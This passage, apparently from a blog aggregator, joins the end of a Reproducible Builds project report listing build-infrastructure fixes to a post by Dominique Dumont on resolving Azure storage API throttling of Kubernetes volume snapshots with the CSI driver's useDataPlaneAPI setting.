    • Run the underlying debrebuild script under nice. [ ]
    • Try to use TMPDIR when calling debrebuild. [ ][ ]
  • buildinfos.debian.net-related:
    • Stop creating buildinfo-pool_${suite}_${arch}.list files. [ ]
    • Temporarily disable automatic updates of pool links. [ ]
  • FreeBSD-related:
    • Fix the sudoers to actually permit builds. [ ]
    • Disable debug output for FreeBSD rebuilding jobs. [ ]
    • Upgrade to FreeBSD 14.2 [ ] and document that bmake was installed on the underlying FreeBSD virtual machine image [ ].
  • Misc:
    • Update the real year to 2025. [ ]
    • Don't try to install a Debian bookworm kernel from backports on the infom08 node, which is running Debian trixie. [ ]
    • Don't warn about system updates for systems running Debian testing. [ ]
    • Fix a typo in the ZOMBIES definition. [ ][ ]
In addition:
  • Ed Maste modified the FreeBSD build system to clean the object directory before commencing a build. [ ]
  • Gioele Barabucci updated the rebuilder stats to first add a category for network errors [ ] as well as to categorise failures without a diffoscope log [ ].
  • Jessica Clarke also made some FreeBSD-related changes, including:
    • Ensuring we clean up the object directory for the second build as well. [ ][ ]
    • Updating the sudoers for the relevant rm -rf command. [ ]
    • Updating the cleanup_tmpdirs method to match other removals. [ ]
  • Jochen Sprickerhof:
  • Roland Clobus:
    • Update the reproducible_debstrap job to call Debian s debootstrap with the full path [ ] and to use eatmydata as well [ ][ ].
    • Make some changes to deduce the CPU load in the debian_live_build job. [ ]
Lastly, both Holger Levsen [ ] and Vagrant Cascadian [ ] performed some node maintenance.
If you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. You can also get in touch with us via:

4 February 2025

Dominique Dumont: Azure API throttling strikes back

Hi In my last blog, I explained how we resolved a throttling issue involving the Azure storage API. In the end, I mentioned that I was not sure of the root cause of the throttling issue. Even though we no longer had any problem in the dev and preprod clusters, we still faced throttling issues in prod. The main difference between these 2 environments is that we have about 80 PVs in prod versus 15 in the other environments. Given that we manage 1500 pods in prod, 80 PVs does not look like a lot. To continue the investigation, I've modified k8s-scheduled-volume-snapshotter to limit the number of snapshots done in a single cron run (see the add maxSnapshotCount parameter pull request). In prod, we used the modified snapshotter to trigger snapshots one by one. Even with all previous snapshots cleaned up, we could not trigger a single new snapshot without being throttled. I guess that, in the cron job, just checking the list of PVs to snapshot was enough to exhaust our API quota. The Azure docs mention that a leaky bucket algorithm is used for throttling. A full bucket holds tokens for 250 API calls, and the bucket gets 25 new tokens per second. Looks like that's not enough. I was puzzled and out of ideas. I looked for similar problems in AKS issues on GitHub, where I found this comment that recommends using the useDataPlaneAPI parameter in the CSI file driver. That was it! I was flabbergasted by this parameter: why is the CSI file driver able to use 2 APIs? Why is one of them so limited? And more importantly, why is the limited API the default one? Anyway, setting useDataPlaneAPI: "true" in our VolumeSnapshotClass manifest was the right solution (a sketch of such a manifest is at the end of this post). This indeed solved the throttling issue in our prod cluster. But not the snapshot issue. Amongst the 80 PVs, I still had 2 snapshots failing. Fortunately, the error was mentioned in the description of the failed snapshots: we had too many (200) snapshots for these shared volumes. What?? All these snapshots were cleaned up last week. I then tried to delete these snapshots through the Azure console. But the console failed to delete these snapshots due to API throttling. Looks like the Azure console is not using the right API. Anyway, I went back to the solution explained in my previous blog: I listed all snapshots with the az command. I indeed had a lot of snapshots, many of them dated Jan 19 and 20. There was often a new bogus snapshot created every minute. These were created during the first attempt at fixing the throttling issue. I guess that even though the CSI file driver was throttled, a snapshot was still created in the storage account, but the CSI driver did not see it and retried a minute later. What a mess. Anyway, I've cleaned up these bogus snapshots again, and now snapshot creation is working fine. For now. All the best.
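For anyone hitting the same wall, the change lands in the snapshot class. A sketch of such a manifest, with an illustrative name (file.csi.azure.com is the Azure Files CSI driver; the parameter is the one discussed above):

    apiVersion: snapshot.storage.k8s.io/v1
    kind: VolumeSnapshotClass
    metadata:
      name: azurefile-snapclass      # illustrative name
    driver: file.csi.azure.com
    deletionPolicy: Delete
    parameters:
      useDataPlaneAPI: "true"        # switch the driver to the data-plane API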
